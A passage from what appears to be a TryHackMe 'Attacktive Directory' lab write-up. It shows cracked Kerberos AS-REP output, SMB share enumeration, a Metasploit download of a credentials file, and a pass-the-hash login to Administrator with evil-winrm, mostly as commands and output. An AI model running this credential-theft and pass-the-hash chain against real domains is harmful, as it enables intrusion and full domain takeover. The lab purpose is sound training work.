Press 'q' or Ctrl-C to abort, almost any other key for status
mxxxxxxxxxxxxx   ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)
1g 0:00:00:00 DONE (2020-04-17 13:20) 33.33g/s 221866p/s 221866c/s 221866C/s horoscope..amy123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#
The password list and users are available in the challenge room

after getting the credentials of svc-admin, we'll move on checking the shared file with the user and look for anything that we can use, listing the files show us a backup file, that backup file after downloading it will contain an encoded base64, decoding it will give us back another user credentials.

root@kali:~# smbmap -H spookysec.local -d spookysec.local -u svc-admin -p mxxxxxxxxxxxxx
[+] Finding open SMB ports....
[+] User SMB session established on spookysec.local...
[+] IP: spookysec.local:445     Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        .                                                  
        dr--r--r--                0 Sat Apr  4 19:08:39 2020    .
        dr--r--r--                0 Sat Apr  4 19:08:39 2020    ..
        fr--r--r--               48 Sat Apr  4 19:08:53 2020    backup_credentials.txt
        backup                                                  READ ONLY
        C$                                                      NO ACCESS       Default share
        .                                                  
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    InitShutdown
        fr--r--r--                4 Mon Jan  1 00:00:00 1601    lsass
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    ntsvcs
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    scerpc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-3e8-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    epmapper
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-290-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    LSM_API_service
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    eventlog
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-428-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    TermSrv_API_service
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    Ctx_WinStation_API_service
        fr--r--r--                4 Mon Jan  1 00:00:00 1601    wkssvc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-30c-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-30c-1
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    SessEnvPublicRpc
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    atsvc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-3b8-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-710-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    RpcProxy\49671
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    72bba0c63ba338fa
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    RpcProxy\593
        fr--r--r--                4 Mon Jan  1 00:00:00 1601    srvsvc
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    spoolss
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-880-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    netdfs
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    W32TIME_ALT
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-2fc-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-9d8-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-97c-0
        IPC$                                                    READ ONLY       Remote IPC
        .                                                  
        dr--r--r--                0 Sat Apr  4 18:39:35 2020    .
        dr--r--r--                0 Sat Apr  4 18:39:35 2020    ..
        NETLOGON                                                READ ONLY       Logon server share 
        .                                                  
        dr--r--r--                0 Sat Apr  4 18:39:35 2020    .
        dr--r--r--                0 Sat Apr  4 18:39:35 2020    ..
        dr--r--r--                0 Sat Apr  4 18:39:35 2020    spookysec.local
        SYSVOL                                                  READ ONLY       Logon server share 
root@kali:~#
msf5 auxiliary(admin/smb/download_file) > show options 

Module options (auxiliary/admin/smb/download_file):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_RPATHS                   no        A file containing a list remote files relative to the share to operate on
   RHOSTS       spookysec.local  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH        backup_credentials.txt       no        The name of the remote file relative to the share to operate on
   RPORT        445              yes       The SMB service port (TCP)
   SMBDomain    spookysec.local  no        The Windows domain to use for authentication
   SMBPass      mxxxxxxxxxxxxx   no        The password for the specified username
   SMBSHARE     backup           yes       The name of a share on the RHOST
   SMBUser      svc-admin        no        The username to authenticate as
   THREADS      1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(admin/smb/download_file) > run

[+] 10.10.237.175:445     - backup_credentials.txt saved as: /root/.msf4/loot/20200417133840_default_10.10.237.175_smb.shares.file_838056.txt
[*] spookysec.local:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/download_file) >

with the password of backup user we can dump domain controller users hashes

the next step we can either decrypt the NTLM hash and connect to Administrator, or use the beautiful piece of code evil-winrm, feel free to check the Github repository and read more about how the tool works, Links at the end of the article.

root@kali:~# git clone https://github.com/Hackplayers/evil-winrm.git
Cloning into 'evil-winrm'...
remote: Enumerating objects: 72, done.
remote: Counting objects: 100% (72/72), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 772 (delta 38), reused 32 (delta 14), pack-reused 700
Receiving objects: 100% (772/772), 1.92 MiB | 1.87 MiB/s, done.
Resolving deltas: 100% (443/443), done.
root@kali:~# gem install evil-winrm
Fetching: builder-3.2.4.gem (100%)
Successfully installed builder-3.2.4
Fetching: erubi-1.9.0.gem (100%)
Successfully installed erubi-1.9.0
Fetching: gssapi-1.3.0.gem (100%)
Successfully installed gssapi-1.3.0
Fetching: gyoku-1.3.1.gem (100%)
Successfully installed gyoku-1.3.1
Fetching: httpclient-2.8.3.gem (100%)
Successfully installed httpclient-2.8.3
Fetching: multi_json-1.14.1.gem (100%)
Successfully installed multi_json-1.14.1
Fetching: little-plugger-1.1.4.gem (100%)
Successfully installed little-plugger-1.1.4
Fetching: logging-2.2.2.gem (100%)
Successfully installed logging-2.2.2
Fetching: nori-2.6.0.gem (100%)
Successfully installed nori-2.6.0
Fetching: rubyntlm-0.6.2.gem (100%)
Successfully installed rubyntlm-0.6.2
Fetching: winrm-2.3.4.gem (100%)
Successfully installed winrm-2.3.4
Fetching: winrm-fs-1.3.4.gem (100%)
Successfully installed winrm-fs-1.3.4
Fetching: stringio-0.1.0.gem (100%)
Building native extensions. This could take a while...
Successfully installed stringio-0.1.0
Fetching: evil-winrm-2.3.gem (100%)
Happy hacking! :)
Successfully installed evil-winrm-2.3
Parsing documentation for builder-3.2.4
Installing ri documentation for builder-3.2.4
Parsing documentation for erubi-1.9.0
Installing ri documentation for erubi-1.9.0
Parsing documentation for gssapi-1.3.0
Installing ri documentation for gssapi-1.3.0
Parsing documentation for gyoku-1.3.1
Installing ri documentation for gyoku-1.3.1
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Parsing documentation for multi_json-1.14.1
Installing ri documentation for multi_json-1.14.1
Parsing documentation for little-plugger-1.1.4
Installing ri documentation for little-plugger-1.1.4
Parsing documentation for logging-2.2.2
Installing ri documentation for logging-2.2.2
Parsing documentation for nori-2.6.0
Installing ri documentation for nori-2.6.0
Parsing documentation for rubyntlm-0.6.2
Installing ri documentation for rubyntlm-0.6.2
Parsing documentation for winrm-2.3.4
Installing ri documentation for winrm-2.3.4
Parsing documentation for winrm-fs-1.3.4
Installing ri documentation for winrm-fs-1.3.4
Parsing documentation for stringio-0.1.0
Installing ri documentation for stringio-0.1.0
Parsing documentation for evil-winrm-2.3
Installing ri documentation for evil-winrm-2.3
Done installing documentation for builder, erubi, gssapi, gyoku, httpclient, multi_json, little-plugger, logging, nori, rubyntlm, winrm, winrm-fs, stringio, evil-winrm after 6 seconds
14 gems installed
root@kali:~#
root@kali:~# evil-winrm -i 10.10.237.175 -u Administrator -H e48xxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And here we go Administrator user, there isn't much we can't do now ...

Happy Hacking!

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing
A tool to perform Kerberos pre-auth bruteforcing. Contribute to ropnop/kerbrute development by creating an account on GitHub.
GitHubropnop
GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting
The ultimate WinRM shell for hacking/pentesting. Contribute to Hackplayers/evil-winrm development by creating an account on GitHub.
GitHubHackplayers
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
Impacket is a collection of Python classes for working with network protocols. - GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
GitHubfortra
TryHackMe | Attacktive Directory
99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
TryHackMe